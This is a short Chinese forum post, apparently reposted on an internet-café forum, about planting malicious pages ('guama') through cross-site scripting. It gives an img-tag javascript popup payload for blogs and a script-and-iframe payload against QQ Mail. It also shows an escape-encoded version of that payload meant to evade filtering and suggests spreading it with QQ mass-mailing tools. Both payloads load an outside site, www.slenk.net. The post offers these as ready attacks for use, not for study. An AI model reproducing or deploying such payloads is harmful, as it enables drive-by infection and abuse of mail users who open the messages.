记得以前搞博客跨站挂马！

　　是利用下面这段弹窗的：

　　<img src=javascript:open('http://www.slenk.net','幽月','width=400,height=300')>现在漏 洞被封啦！

　　下面搞QQ邮箱挂马：

　　大家可以利用QQ群发工具或软件来利用：

　　这是新漏洞！

　　这是跨站的代码。可以直接支持JS 但QQ有过滤空格，相信大家应该明白这一点。空格被转换成“ ”   “ ”在HTML下代表空格。

　　源代码：

<script>document.write("<iframe src=http://www.slenk.net width=100% height=400></iframe><br>十三教程测试。")</script><script>

　　JS加密网：

http://www.webmasterhome.cn/tool/Encode.asp

　　加密后的代码：

<script>document.write(unescape('%3Cscript%3Edocument.write%28%22%3Ciframe%20src%3Dhttp%3A//www.slenk.net%20width%3D100%25%20height%3D400%3E%3C/iframe%3E%3Cbr%3E%u5341%u4E09%u6559%u7A0B%u6D4B%u8BD5%u3002%22%29%3C/script%3E%3Cscript%3E'))</script>

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理，安装维护: